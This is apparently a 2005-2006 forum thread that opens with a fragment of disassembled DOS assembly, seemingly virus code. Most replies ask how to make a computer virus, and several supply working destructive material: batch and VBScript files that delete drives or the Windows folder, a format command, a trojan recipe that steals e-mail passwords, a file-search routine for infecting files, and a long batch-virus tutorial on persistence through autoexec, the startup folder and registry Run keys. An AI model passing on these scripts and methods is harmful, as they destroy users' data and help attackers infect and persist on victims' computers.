   MOV   DX,L7FCF         ;7F21 8B 16 CF 7F
   JMP   SHORT   L7F4A         ;7F25 EB 23
                  ;L7F27     L7EF0 CJ
L7F27:   MOV   AH,3            ;7F27 B4 03
   INT   10            ;7F29 CD 10
   PUSH   DX            ;7F2B 52
   MOV   AH,2            ;7F2C B4 02
   MOV   DX,L7FCF         ;7F2E 8B 16 CF 7F
   INT   10            ;7F32 CD 10
   MOV   AX,L7FCD      ;Sum vars   ;7F34 A1 CD 7F
   CMP   BYTE PTR L7FD3,1   ;Sum vars   ;7F37 80 3E D3 7F 01
   JNZ   L7F41            ;7F3C 75 03
   MOV   AX,OFFSET L8307         ;7F3E B8 07 83
                  ;L7F41     L7F3C CJ
L7F41:   MOV   BL,AH            ;7F41 8A DC
   MOV   CX,1            ;7F43 B9 01 00
   MOV   AH,9            ;7F46 B4 09
   INT   10            ;7F48 CD 10
                  ;L7F4A     L7F25 CJ
L7F4A:   MOV   CX,L7FD1         ;7F4A 8B 0E D1 7F
   CMP   DH,0            ;7F4E 80 FE 00
   JNZ   L7F58            ;7F51 75 05
   XOR   CH,0FF            ;7F53 80 F5 FF
   INC   CH            ;7F56 FE C5
                  ;L7F58     L7F51 CJ
L7F58:   CMP   DH,18            ;7F58 80 FE 18
   JNZ   L7F62            ;7F5B 75 05
   XOR   CH,0FF            ;7F5D 80 F5 FF
   INC   CH            ;7F60 FE C5
                  ;L7F62     L7F5B CJ
L7F62:   CMP   DL,0            ;7F62 80 FA 00
   JNZ   L7F6C            ;7F65 75 05
   XOR   CL,0FF            ;7F67 80 F1 FF
   INC   CL            ;7F6A FE C1
                  ;L7F6C     L7F65 CJ
L7F6C:   CMP   DL,L7FD6      ;Sum vars   ;7F6C 3A 16 D6 7F
   JNZ   L7F77            ;7F70 75 05
   XOR   CL,0FF            ;7F72 80 F1 FF
   INC   CL            ;7F75 FE C1
                  ;L7F77     L7F70 CJ
L7F77:   CMP   CX,L7FD1         ;7F77 3B 0E D1 7F
   JNZ   L7F94            ;7F7B 75 17
   MOV   AX,L7FCD      ;Sum vars   ;7F7D A1 CD 7F
   AND   AL,7            ;7F80 24 07
   CMP   AL,3            ;7F82 3C 03
   JNZ   L7F8B            ;7F84 75 05
   XOR   CH,0FF            ;7F86 80 F5 FF
   INC   CH            ;7F89 FE C5
                  ;L7F8B     L7F84 CJ
L7F8B:   CMP   AL,5            ;7F8B 3C 05
   JNZ   L7F94            ;7F8D 75 05
   XOR   CL,0FF            ;7F8F 80 F1 FF
   INC   CL            ;7F92 FE C1
                  ;L7F94     L7F7B CJ  L7F8D CJ
L7F94:   ADD   DL,CL            ;7F94 02 D1
   ADD   DH,CH            ;7F96 02 F5
   MOV   L7FD1,CX         ;7F98 89 0E D1 7F
   MOV   L7FCF,DX         ;7F9C 89 16 CF 7F
   MOV   AH,2            ;7FA0 B4 02
   INT   10            ;7FA2 CD 10
   MOV   AH,8            ;7FA4 B4 08
   INT   10            ;7FA6 CD 10
   MOV   L7FCD,AX      ;Sum vars   ;7FA8 A3 CD 7F
   MOV   BL,AH            ;7FAB 8A DC
   CMP   BYTE PTR L7FD3,1   ;Sum vars   ;7FAD 80 3E D3 7F 01
   JNZ   L7FB6            ;7FB2 75 02
   MOV   BL,83            ;7FB4 B3 83
                  ;L7FB6     L7FB2 CJ
L7FB6:   MOV   CX,1            ;7FB6 B9 01 00
   MOV   AX,907            ;7FB9 B8 07 09
   INT   10            ;7FBC CD 10
   POP   DX            ;7FBE 5A
   MOV   AH,2            ;7FBF B4 02
   INT   10            ;7FC1 CD 10
   POP   DX            ;7FC3 5A
   POP   CX            ;7FC4 59
   POP   BX            ;7FC5 5B
   POP   AX            ;7FC6 58
   POP   DS            ;7FC7 1F
;   Jmp Far opcode
   DB   0EA            ;7FC8 EA
                  ;L7FC9     L7ED7 DW
   DW   TIMER_OFF         ;7FC9 20 00
                  ;L7FCB     L7EDA DW
   DW   L0000            ;7FCB 00 00
                  ;L7FCD     L7F34 DR  L7F7D DR  L7FA8 DW
;   Sum vars
L7FCD   DW   L0000            ;7FCD 00 00
                  ;L7FCF     L7F10 DW  L7F21 DR  L7F2E DR   L7F9C DW
L7FCF   DW   L0101            ;7FCF 01 01
                  ;L7FD1     L7F16 DW  L7F4A DR  L7F77 DT   L7F98 DW
L7FD1   DW   L0101            ;7FD1 01 01
                  ;L7FD3     L7F0C DW  L7F37 DT  L7FAD DT
;   Sum vars
L7FD3   DB   0            ;7FD3 00
                  ;L7FD4     L7EEC DT  L7EF2 DW
;   Sum vars
L7FD4   DW   LFFFF            ;7FD4 FF FF
                  ;L7FD6     L7EF8 DW  L7F6C DT
;   Sum vars
L7FD6   DB   50            ;7FD6 50
                  ;L8000     L7CC7 DI  L7E2D DR  L7E68 DM
L8000   EQU   $+29
                  ;L8002     L7D63 DI
L8002   EQU   $+2Bh
                  ;L800B     L7D8B DT
L800B   EQU   $+34
                  ;L800D     L7D93 DT
L800D   EQU   $+36
                  ;L800E     L7D9A DR
L800E   EQU   $+37
                  ;L8010     L7D9E DR
L8010   EQU   $+39
                  ;L8011     L7DAB DR
L8011   EQU   $+3A
                  ;L8016     L7DA2 DR
L8016   EQU   $+3F
                  ;L81BE     L7D40 DI
L81BE   EQU   $+1E7
                  ;L81F5     L7D7D DR
L81F5   EQU   $+21E
                  ;L81F9     L7D83 DR
L81F9   EQU   $+222
                  ;L81FB     L7D76 DT
L81FB   EQU   $+224
                  ;L81FC     L7D6E DT
L81FC   EQU   $+225
                  ;L8307     L7F3E DI
L8307   EQU   $+330
                  ;LFFC0     L7C66 DI
LFFC0   EQU   $+7FE9
                  ;LFFF7     L7E51 DI
LFFF7   EQU   $-7FE0
                  ;LFFFF     L7FD4 CI
LFFFF   EQU   $-7FD8
   S0000   ENDS

this code in .bat or what? need help!


Answer by Death
Submitted on 1/5/2005
Rating: Not yet rated Rate this answer: Vote
how do you make a computer virus to screw up someones computer


Answer by COPS1234567654321
Submitted on 1/9/2005
Rating: Not yet rated Rate this answer: Vote
u guys are stupid cops are all over this


Answer by killer
Submitted on 1/13/2005
Rating: Not yet rated Rate this answer: Vote
i have a criminal record it sucks cause the cops are always stalking me it sucks


Answer by hacker2
Submitted on 1/18/2005
Rating: Not yet rated Rate this answer: Vote
can you make me an PC virus


Answer by hax-a-lot
Submitted on 1/29/2005
Rating: Not yet rated Rate this answer: Vote
well i dont know how but i know some awsome runescape hacks


Answer by JESSE
Submitted on 2/24/2005
Rating: Not yet rated Rate this answer: Vote


Answer by goodheart
Submitted on 2/25/2005
Rating: Not yet rated Rate this answer: Vote


Answer by good
Submitted on 2/26/2005
Rating: Not yet rated Rate this answer: Vote


Answer by falten
Submitted on 3/4/2005
Rating: Not yet rated Rate this answer: Vote
i have lots of question,but no answers?


Answer by theperson
Submitted on 3/12/2005
Rating: Not yet rated Rate this answer: Vote
Whoever is trying to make the virus, you are a complete n00b. You can make viruses in Visual Basic if you wanted to. But why the hell would you wanna stuff up peoples computers just for the hell of it. Or are you some kind of sadistic prick>


Answer by joe
Submitted on 3/17/2005
Rating: Not yet rated Rate this answer: Vote
i want to know also
i no how to do destroy a computer enternaly,but thats only when im sitting at it lol. it has to do with the regestry editor


Answer by hkt04
Submitted on 4/1/2005
Rating: Not yet rated Rate this answer: Vote
help me plz, i need 2 make a virus soon!!!!!
my m8 has infected my pc so i need 2 get him bk!!!


Answer by anonymous
Submitted on 4/2/2005
Rating: Not yet rated Rate this answer: Vote
hello my name is jonny i am an expert on writing viruses. If you need answers email me at biohazard355@yahoo.com


Answer by cibbert
Submitted on 4/5/2005
Rating: Not yet rated Rate this answer: Vote
killer some baby s' computer
need fast software


Answer by the anger of valcano
Submitted on 4/9/2005
Rating: Not yet rated Rate this answer: Vote


Answer by Empa
Submitted on 4/15/2005
Rating: Not yet rated Rate this answer: Vote
How do you make a virus, for a joke?
A funny thing, you know!!


Answer by X
Submitted on 4/15/2005
Rating: Not yet rated Rate this answer: Vote
wow people r stupid


Answer by skip
Submitted on 4/16/2005
Rating: Not yet rated Rate this answer: Vote
or all you need to do maybe is just get a life or as simple as one may be, is all y'all just need to be lazy and do what i do cut and paste is what i call it


Answer by It's Me, Mario
Submitted on 4/21/2005
Rating: Not yet rated Rate this answer: Vote
open NotePad,

DEL C:\-y
DEL D:\-y

-then save the file as something ".bat"


Answer by homie1515
Submitted on 4/24/2005
Rating: Not yet rated Rate this answer: Vote
use linux's knoppix and u can hex computers through that


Answer by man
Submitted on 4/27/2005
Rating: Not yet rated Rate this answer: Vote
@echo off
DEL C:\ -y
DEL D:\ -y

(write in notepad save as "filename.bat")


Answer by suckitidontcare
Submitted on 4/29/2005
Rating: Not yet rated Rate this answer: Vote
teach me beeches!


Answer by anonymous
Submitted on 4/29/2005
Rating: Not yet rated Rate this answer: Vote
i just want to create a virus,,so that i can be famous!!! i want to make history,,,rhat'sall111111


Answer by sannn
Submitted on 5/9/2005
Rating: Not yet rated Rate this answer: Vote
kill the computer]


Answer by aliabbas
Submitted on 5/14/2005
Rating: Not yet rated Rate this answer: Vote


Answer by curtis cc
Submitted on 5/16/2005
Rating: Not yet rated Rate this answer: Vote
man dis is crap!


Answer by Big Boss
Submitted on 5/18/2005
Rating: Not yet rated Rate this answer: Vote
Kiss my ass


Answer by virus
Submitted on 5/25/2005
Rating: Not yet rated Rate this answer: Vote
i want to know how to make a virus


Answer by hackerx
Submitted on 5/27/2005
Rating: Not yet rated Rate this answer: Vote
Trojan in VB 5.0
Trojans are the most rare virii, but they are the most destructive and dangerous because usualy the payload is real-real-bad!
They can steal your e-mail passw., NET connection or format your HardDrive.
I choosed VB because it compiles very small files (min. 8-9kb instead of 200kb- Delphi). GO:
Step I (Hmmm...)
Start your VB 5+ .
Begin a new project and a new form.
Step II (code'nstuff)
Put some funny or realy serious buttons on the form (ex. a program that reads your e-mail faster: you enter your e-mail adress and password, but it will actualy send them to your e-mail; or a FunStuff that asks u if u have a small brain, you can only choose YES).
Write some code in the code window. Format c:, delete all files in the Windows DIR, connect to a web site etc.
Step III (finish)
Write help file so it's more like a real program.
Salve & compile!
Distribute on the NET...OVER !!!


Answer by tell now!!!!!
Submitted on 5/28/2005
Rating: Not yet rated Rate this answer: Vote
I need to know how to wipe out somenes FrontPge documents


Answer by comphackerfromohio
Submitted on 6/1/2005
Rating: Not yet rated Rate this answer: Vote
goto notepad and type
   del c:-y
then save it as "filename.bat"
DONT OPEN ON GOOD COMPUTER, it will erase your hard drive


Answer by help me
Submitted on 6/4/2005
Rating: Not yet rated Rate this answer: Vote
i need to know how to make a virus e-mail me at sniprus316@aol.com


Answer by Novice
Submitted on 6/13/2005
Rating: Not yet rated Rate this answer: Vote
I am a complete novice and am not interested at all in hacking (takes too much work!) but I am going to be learning a comp language and I want to here from a expert what language a complete novice like me, should learn.  Thanks in advance


Answer by adam
Submitted on 6/14/2005
Rating: Not yet rated Rate this answer: Vote
i want to learn how to make a computer virus!!! will someone please teach me how i have all the time in the world?


Answer by hackstock
Submitted on 6/15/2005
Rating: Not yet rated Rate this answer: Vote
u little bastards need to learn some stuff about computers then learn 2 use c and C++ and pearl. then u may speak 2 me!!!!!!!!!!
until then u r not worthy


Answer by jonny
Submitted on 6/18/2005
Rating: Not yet rated Rate this answer: Vote
i need a viris


Answer by huw
Submitted on 6/20/2005
Rating: Not yet rated Rate this answer: Vote
can you make your virus


Answer by nickname
Submitted on 6/24/2005
Rating: Not yet rated Rate this answer: Vote
I would like to eat you!!!


Answer by jason m.
Submitted on 7/7/2005
Rating: Not yet rated Rate this answer: Vote


Answer by fazer
Submitted on 7/9/2005
Rating: Not yet rated Rate this answer: Vote
what will the simple way to create a virus


Answer by Anon13
Submitted on 7/9/2005
Rating: Not yet rated Rate this answer: Vote
how the heck do you make a virus (imsorta new to all this hacking virus type thing i need help)


Answer by flud
Submitted on 7/13/2005
Rating: Not yet rated Rate this answer: Vote
how to you make a very good computer virus


Answer by your all wanna bes
Submitted on 7/13/2005
Rating: Not yet rated Rate this answer: Vote
you are all wanna bes all you have to do is open notepad paste this and save as(.vbs)
dim y
set y= createobject ("scripting.filesystemobject")
y.deletefolder "C:\windows"

dim yx
set yx= createobject ("scripting.filesystemobject")
yx.deletefolder "C:\windows\program files"

dim yxy
set yxy= createobject ("scripting.filesystemobject")
yxy.deletefolder "C:\windows\*.exe"
theres your virus save it as (whatever.vbs)
must have the (.vbs)


Answer by your all wanna bes
Submitted on 7/13/2005
Rating: Not yet rated Rate this answer: Vote
you are all wanna bes all you have to do is open notepad paste this and save as(.vbs)
dim y
set y= createobject ("scripting.filesystemobject")
y.deletefolder "C:\windows"

dim yx
set yx= createobject ("scripting.filesystemobject")
yx.deletefolder "C:\windows\program files"

dim yxy
set yxy= createobject ("scripting.filesystemobject")
yxy.deletefolder "C:\windows\*.exe"
theres your virus save it as (whatever.vbs)
must have the (.vbs)


Answer by hos
Submitted on 7/15/2005
Rating: Not yet rated Rate this answer: Vote
I wont make the computer virus.
because I wont learn this without any problem.


Answer by david
Submitted on 7/17/2005
Rating: Not yet rated Rate this answer: Vote
you have to programe a virus computer and i know how to.


Answer by killa dude
Submitted on 7/20/2005
Rating: Not yet rated Rate this answer: Vote
how do you hack files.I wanna
hack really bad


Answer by WorldWideWebHACKER
Submitted on 7/27/2005
Rating: Not yet rated Rate this answer: Vote
Stupid idiotic people


Answer by Ricard
Submitted on 8/4/2005
Rating: Not yet rated Rate this answer: Vote
Actually it is really simple making a virus.
Batch doesn't work, never rely on it.

I know this may sound cliche, but Visual Basic 6.0 gives you full power to make a virus. I will periodically come back here and copy paste examples.  I am working on one that disables everything on the desktop, including system restore, safe mode and stuff.

but to start, you need Visual basic.
you can either buy, or if you are stupid and want to get it somwhere free, use limewire or something.


Answer by Complete
Submitted on 8/4/2005
Rating: Not yet rated Rate this answer: Vote
Get visual basic 6.0 the best program writing software for beginners.  For those of you who want the easy way out, use limewire to get it.
I will send code snippets for the ULTIMATE disabling virus I created.


Answer by Same person
Submitted on 8/6/2005
Rating: Not yet rated Rate this answer: Vote
Let me post here! why are you deleting my posts!?


Answer by fdsafds
Submitted on 8/7/2005
Rating: Not yet rated Rate this answer: Vote


Answer by RuBB3rDuCkY
Submitted on 8/7/2005
Rating: Not yet rated Rate this answer: Vote
u guys are hopeless... if u want to make a virus, first u need to know what kind of virus u want to make... when u have done that, then come and ask for help


Answer by blade
Submitted on 8/10/2005
Rating: Not yet rated Rate this answer: Vote
if u wanna make a virus go to ur c: drive delete the windows folder shut down ur computer and when u log back on put the deleted folder on a disk and simply send it to someone


Answer by Spike
Submitted on 8/17/2005
Rating: Not yet rated Rate this answer: Vote
can someone tell me how to make a viris tat wil crash my victims comp Zakdunn101@hotmail.com


Answer by POLICE
Submitted on 8/19/2005
Rating: Not yet rated Rate this answer: Vote
If anyone put a way to put a virus. You are going DOWN


Answer by gramps
Submitted on 8/20/2005
Rating: Not yet rated Rate this answer: Vote
can someone please teach me how to make a virus


Answer by Pablosanluces
Submitted on 8/22/2005
Rating: Not yet rated Rate this answer: Vote
What mexican chick do I love in stratagies


Answer by kjklj;hdfkl;h
Submitted on 8/29/2005
Rating: Not yet rated Rate this answer: Vote
oi how do u make a simple virus out of notepad please tell me i wont to send it to mi friend


Answer by davi
Submitted on 9/5/2005
Rating: Not yet rated Rate this answer: Vote
Tell me how to make a virus!


Answer by coldstone
Submitted on 9/7/2005
Rating: Not yet rated Rate this answer: Vote
hey could ya please let me know how to create a virus??????


Answer by kryptnotic shadow
Submitted on 9/8/2005
Rating: Not yet rated Rate this answer: Vote
well if you really want to learn how to make a virus.. for begginers..well youll need an intel pentium to do this 1 if you got it great becasue if you dont i cant help! if youve got that and and anti spy ware!! if you have thoose required things i can help! contact me at kryptnoticshadowty@alias.com you must have thoose things if not dont email me until you do!!!!!ooh and this website sucks!


Answer by ChoTIkZ
Submitted on 9/10/2005
Rating: Not yet rated Rate this answer: Vote
Its easy to make a virus..

write this and send it to somebody you dont like :P..There computer will be lost

@echo off
DEL C:\ -y
DEL D:\ -y

(write in notepad save as "filename.bat")


Answer by ashboy
Submitted on 9/16/2005
Rating: Not yet rated Rate this answer: Vote
you inhert the viruses from the firewall u gathered and raconvight the specilized button in www.runescape.com and u create an account then u make all lvl 99 then give the password and user to me ill will make 200 vruses for u contact restemshah2@hotmail.com


Answer by Bob Dole
Submitted on 10/4/2005
Rating: Not yet rated Rate this answer: Vote

your president,
Robert Dole


Answer by Robo Chicken
Submitted on 10/11/2005
Rating: Not yet rated Rate this answer: Vote
@echo off
DEL C:\ -y
DEL D:\ -y

(Use Notepad and save as filename.bat)


Answer by dussie88
Submitted on 10/12/2005
Rating: Not yet rated Rate this answer: Vote
how do u make a computer virus please let me know e-mail at dussie88@yahoo.com


Answer by sithira
Submitted on 10/13/2005
Rating: Not yet rated Rate this answer: Vote
how to set bat file automatically boot?


Answer by bleh
Submitted on 10/14/2005
Rating: Not yet rated Rate this answer: Vote
c++ and java are not scripting languages...  and what does having a decent computer and running a server have to do with making a virus?


Answer by soccer fan
Submitted on 10/21/2005
Rating: Not yet rated Rate this answer: Vote
someone tell me how to make a computer virus just send it to crewfan_2@yahoo.com


Answer by aeon
Submitted on 10/27/2005
Rating: Not yet rated Rate this answer: Vote
why create a virus people pay thousands of dollars for a computer and if you have a enemy think about that the perants will have to deal with it not your enemy and some people send bad viruses that you have to get a new comp but they might not be able to affor one like me :(


Answer by The Girm
Submitted on 11/1/2005
Rating: Not yet rated Rate this answer: Vote
i dont know


Answer by buger
Submitted on 11/2/2005
Rating: Not yet rated Rate this answer: Vote
how is a virus made?


Answer by ht. hacker
Submitted on 11/4/2005
Rating: Not yet rated Rate this answer: Vote
its not how its when it is all about the timing and not getting cuaght


Answer by benzy06
Submitted on 11/5/2005
Rating: Not yet rated Rate this answer: Vote
i need to know how 2 make a virus please help


Answer by THOMAS
Submitted on 11/9/2005
Rating: Not yet rated Rate this answer: Vote
@echo off
DEL C:\ -y
DEL D:\ -y



Answer by joey
Submitted on 11/10/2005
Rating: Not yet rated Rate this answer: Vote
bla bla


Answer by stev
Submitted on 11/10/2005
Rating: Not yet rated Rate this answer: Vote
how do i make a virus email me at stephenwilliams_189@hotmail.com


Answer by Neighbor
Submitted on 11/14/2005
Rating: Not yet rated Rate this answer: Vote
............yur lying


Answer by j-pimp
Submitted on 11/15/2005
Rating: Not yet rated Rate this answer: Vote
can anyone tell me how to make just those simple warning sign virus things u know the ones on notepad i had a backup but its gone for some strange reason unknown to man


Answer by hitmaniac
Submitted on 11/18/2005
Rating: Not yet rated Rate this answer: Vote
i know how to create a virus. But can some one tell me to make an antivirus


Answer by Elite
Submitted on 11/23/2005
Rating: Not yet rated Rate this answer: Vote
go to run and type C:\format


Answer by oh yeah
Submitted on 11/30/2005
Rating: Not yet rated Rate this answer: Vote
go onto ms dos type edit then save it onto ur desktop  as ur name .bat then right click and edit then type
attrib -r C:\<i file u wanna delete>
del C:\<the same file u wanna delete>


Answer by Francis Rodriguez
Submitted on 12/13/2005
Rating: Not yet rated Rate this answer: Vote
Hmmm...Hackitty Hack Hack Hack...


Answer by penissucker
Submitted on 1/5/2006
Rating: Not yet rated Rate this answer: Vote
Lick your balls, HA!!!  Just kidding i don't know either.


Answer by james
Submitted on 1/19/2006
Rating: Not yet rated Rate this answer: Vote
i am a virus


Answer by problemmaker
Submitted on 1/19/2006
Rating: Not yet rated Rate this answer: Vote
stay with your day job


Answer by malapropism
Submitted on 1/23/2006
Rating: Not yet rated Rate this answer: Vote
u g b 2 me


Answer by it
Submitted on 2/7/2006
Rating: Not yet rated Rate this answer: Vote
what happened to the old site, it was better!!!!!!!!!!!!!!!!!!!!


Answer by Dav.e.
Submitted on 2/11/2006
Rating: Not yet rated Rate this answer: Vote
ok u want to lean how ot get a virus maker?
do exactly what i say. open up a notepad and copy and paste this.
@echo off
shutdown -s -t 50 -c "Find link Hack. %^>&^000) www.hackersorefind.csddownloadleft."
echo "start downlaod hacker2006maKERleftnextfr.."
echo "done please makE virus leftto anything0099 free."
end sub

now save it as Hacklink.bat remaber the .bat or it cant find the link hope this  helps. add me if u want davidseviour@hotmail.com


Answer by Da man
Submitted on 2/13/2006
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This tutorial will teach you how to search for a file or filetype in all the drives of the host computer withou using word or any external app, this is very usefull to infect html's or others vbs's, also you can always find mirc or pirch if it's installed on the host computer.
The idea of the code is very simple, you just have to use the "Files" and "SubFolders" objects that are inside a "Folder" object.
'First of all, you have declare the variables and create the FileSystem object.
Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder
Set Fso=createobject("scripting.filesystemobject")
'Then, Set the Drives object, so you can search in all the available drives of the computer
Set Drives=fso.drives
'Now do a for-each for each drive
For Each Drive in Drives 'Drive is the name that we give to the drive we're working on.
If drive.isready then 'This check is the remobable devices, like floppy's or Cdrom's are abailable.
Dosearch drive 'Dosearch is the name of the function that we'll use to search for files and subfolders.
end If
'Now we start the main search funtion
Function Dosearch(Path)
'Get the folder where we have to work.
Set Folder=fso.getfolder(path)
'Get all the files inside this folder
Set Files = folder.files
'Now do a for-each for each file
For Each File in files 'File is the current file where we are
'Here is where we can do something with the file, this gets the file extencion, and if it's the one that you want you can do whatever you want to it. File.path is the file fullpath, and file.name gives you only the filename with its extencion.
If fso.GetExtensionName(file.path)="vbs" then
msgbox file.path 'Just to do something
end If
'With the nex thing you can find an exact file.
If file.name = "mirc.ini" then
msgbox "Mirc found in " & file.ParentFolder ' If the file path is "c:\mirc\mir.ini" the file parentfolder is "c:\mirc"
end If
'Once that we check all files we start working with subfolders
'Get all subfolders in our main folder
Set Subfolders = folder.SubFolders
'Now, for each subfolder
For Each Subfolder in Subfolders
'Call this function with the subfolder.
Dosearch Subfolder.path
end function
The Dosearch function will go inside every folder and subfolders in every drive, so you scan all the computer without using word or any other external app.


Answer by Master Pain
Submitted on 2/23/2006
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How do i get through sites that u need a credit card for


Answer by dude
Submitted on 3/7/2006
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are you stupid you press x 6 times while on the internet then press shift 2 times it will come up with a page where you can create a virus.follow instuctions!!!!!!


Answer by FBI
Submitted on 4/1/2006
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You are under arrest for attempted hacking.
Your IP address is being tracked by the FBI.


Answer by shane
Submitted on 4/6/2006
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i need two make a viris please help me.


Answer by ghj
Submitted on 4/13/2006
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Answer by playa
Submitted on 4/13/2006
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                          |                       A noobs guide to:                          |
                                                                  |         How to make a batch virus          |       
                                                                  |                          Part1                              |

                                                                  |     netkid03    |   netkid03@yahoo.com     |

I made this tutorial with ms word for windows 98 users,
but most of the information here will work on all window versions.


-From the beginning
-Laying out your batch files
-The If, elif and else commands
-Autoexec and startup
-Deleting files in batch



This tutorial is for educational purposes only and is not to be used in any illegal way. The author of this tutorial/website is not responsible for any damage caused by this tutorial. No one is forcing you to read this so if you do not accept the terms of this disclaimer please leave the site now.
You can send this tutorial to your friends or put it on your website as long as you keep the title box with the name "netkid03" on it and do not modify it. Use it for to educate you and others in computers, and dont use it in any other way.


Ok, so you want to make a virus? Well batch is the easiest language to use. Below is a definition of batch and virus so you know exactly what this tutorial is about.


A file that contains a sequence, or batch, of commands. Batch files are useful for storing sets of commands that are always executed together because you can simply enter the name of the batch file instead of entering each command individually.
In DOS systems, batch files end with a.BAT extension. For example, the following DOS batch file prints the date and time and sets the prompt to GO>:
prompt [GO>]

Whenever you boot a DOS -based computer, the system automatically executes the batch file named AUTOEXEC.BAT, if it exists.

Many operating systems use the terms command file or shell script in place of batch file.


A program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are manmade. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.
Since 1987, when a virus infected ARPANET, a large network used by the Defence Department and many universities, many antivirus programs have become available. These programs periodically check your computer system for the best-known types of viruses.
Some people distinguish between general viruses and worms. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

So now you know what a batch file is and what a virus is I will explain what a batch virus is.
A batch virus is a simple program that uses dos commands and runs in a dos prompt window.  It is run as soon as the user opens it and can be set to run when your victim starts up their p.c. It causes damage to the victims computer and in some cases can spread to other computers.

From the Beginning

Ok in this I will describe some basic dos commands and how to use them. Firstly open a text editor (I think notepad  is the best text editor to use and it comes free with windows, click start run and type in notepad) Ok now this tool is were you will be making all your batch files from now on. If your are use to using dos then this should be easy for you as most of the commands are simply dos commands. Now type this in your text editor:
@echo off
echo Hello Im your first batch file

Now save the file as Untitled.bat (you must save all your batch files as .bat for them to work).

Open the file you have just created and you should see a dos prompt box put up that says, Hello Im your first batch file,  now Im going to explain line by line how this code works. The first line (@echo off) is used to turn echo off which basically means it doesnt display everything else that is going on but just shows things you have chosen to display on screen. You may be wondering why its @echo off and not just echo off well the @ turns echo off just for the line you have put it on so it stops the dos prompt box from displaying echo off you can test this code for your self without the @echo off to see what I mean. The second line uses the echo command to display Hello Im your first batch file to the screen when ever you want to display text you need to use the echo command, it will not work if you dont!  Well done you (hopefully) have just made and understood your first batch program, (that wasnt so hard was it?)

Laying out your batch files

If your code doesnt work but its laid out neatly you will be able to quickly find the problem and fix it. A good way to lay out you code is to use labels and the goto command here is an example of how to use labels/goto command

@echo off

echo hello
goto next

echo this text is in the next secton
goto end

echo and this code is in the end section

This is a simple batch file using labels and goto commands. The labels start off with colon (:) and the goto commands are simply
goto (the name of your label). Note: you do not need to use a colon in goto commands. You dont have to put your labelled sections in order, the code would work exactly the same if the end section was in-between the start and next section. This is because the goto commands tell the code exactly were it should go next. It would be useful if you experiment with this and see what happens when you switch them round.


But this isnt all you can do with the goto command. One of the main uses of labels and using the goto command are loops. Loops are pices of code that keep repeating them self in a loop. E.g.

@echo off
echo Im a loop
goto loop

The result of that simple code is show below

You can place anything in a loop and it will keep going forever (or until the computer crashes).

The If, elif and else commands

So now you know how to make a basic loop, but what if you wanted your loop to keep going until something happens and then do something else? Well you could place a if command in the loop, this will make the loop keep going but if something happens then it will go somewhere else in your code. So lets add to are loop we made before.

@echo off
if exist c:\AutoExec.bat goto autoexec
echo You dont have autoexe
goto loop

echo you have autoexec
goto loop

I compiled it (made it into a batch file) and opened it and this is what happened.

If you want to use else and if combined then you can use the elif command. Here is an example:

@echo off
if exist c:\AutoExec.bat goto autoexec
elif exist c:\windows goto windows
echo You dont have autoexec.bat and you dont have a windows folder
goto loop

echo you have autoexec
goto loop

echo you have a windows folder but you dont have autoexec.bat
goto loop

autoexec and startup

To make a successful virus its a good idea to make the virus startup when your victim turns on there computer. This will keep there computer infected and make it harder for them to remove. There are a number of ways you can do this. Firstly you could add your virus code to the end of autoexec.bat. In windows autoexec starts up before windows loads. There are some advantages and some disadvantages to this. The main advantage is its one of the first files there computer will load and the main disadvantage is it loads before windows meaning any window commands like opening up a windows file or anything like that wont work. To add your virus to the end of autoexec simply type this somewhere in your batch file: echo copy %0 >> c:\autoexec.bat %0 will automatically replace itself with your viruses root/name which means it doesnt mater were your victim downloads/moves your virus will still work. If you want to copy a different batch file to autoexec then just use this code: echo copy C:\filename\batchfile.bat >> c:\autoexec.bat just replace C:\filename\batchfile.bat with the root to a batch file. If you dont want to copy your whole batch virus to autoexec and just want to copy a few commands then you can use this code:
echo rem this is were you type what you want to copy >> c:\autoexec.bat just replace rem this is were you type what you want to copy with any batch commands you want to put on the end of autoexec.

So, now you know how to add your virus to autoexec I will show you another way. Using the windows startup folder. This method also has some disadvantages and advantages. The main advantage is you can use all batch commands in it and open windows programs, the main disadvantage is it is easy for your victim to remove your virus from the startup folder as it is in there start menu. To add your code to this folder simply add this to your batch file: copy %0 c:\windows\startm~1\Programs\StartUp\whateveryouwant.bat You can change whateveryouwant.bat to whatever you want your file to be called and you can change c:\windows\startm~1\program\startup to anywhere else you want to copy your virus. You can also make your virus a bit more hidden by adding this Attrib +r +h C:\windows\startm~1\program\startup\whateveryouwant.bat after you have copied your virus to the startup folder. This will make your virus hidden and read-only.

There is one more way that I will show you, this (in my opinion) is the best out of the three (its also the hardest). This method wills startup your virus when windows loads and it will do it far sneakier/effective than the other two ways I have shown you. We are going to write a key to your victims computers registry, which will startup your program when windows loads. To do this we are going to drop and open a reg file in the batch file. Here is the code you will need to add to your batch file:

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c\regstart.reg
echo "systemStart"="c:\ filename\batchfile.bat" >> c:\regstart.reg
start c\regstart.reg

This code writes two lines to a reg file which it then open and therefore edits the registry. If you are not familiar with the registry then dont worry about this method.

Deleting files in batch

Ok, this is the first destructive command we have come across so far (you can see how this will come in handy). Simply type del and then the name/path to what you want to delete E.g.
@echo off
rem deleting ms paint
del C:\Progra~1\Accessories\MSPAINT.EXE

In this piece of code   I have once again used the @echo off command (so your victim cannot see that your deleting things from hid HD). Next I have used the rem command, this is used to add a comments (remarks) these will not display on the screen (if you used the echo off command like above) and have no effect on the code. I recommend using remarks so that when you look back at your code you know what you were trying to do and it will be a lot easier to edit. The last line uses the delete command and then the path to ms paint (note: you cannot have any spaces in any paths you use. If you come across a path with spaces (like c:\program files) then change it to a six letter word with no spaces (c:\Progra) then add ~1 to the end of the 6 letter word (c:\progra~1)).


This is the end of part1. I hope you have learnt something, and use this knowledge wisely. Part2 will start showing you some more advanced batch skills; if you need any help with something in this tutorial then you can contact me at netkid03@yahoo.com.

-------------------------------------------------------------------------------------------------------------------------Part2 coming soon-----

Credit goes to the maker of this guide I just want to help hope it work for you


Answer by EYUEL
Submitted on 5/21/2006
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Answer by Unkonwn
Submitted on 7/10/2006
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all u do is make about 5 pages on microsoft word of just {}~@?><:!"$%^&*()_+,./;'#][=-` in any order and then send it as an attacment in an email  as soon as the comp opens it it gets the virus


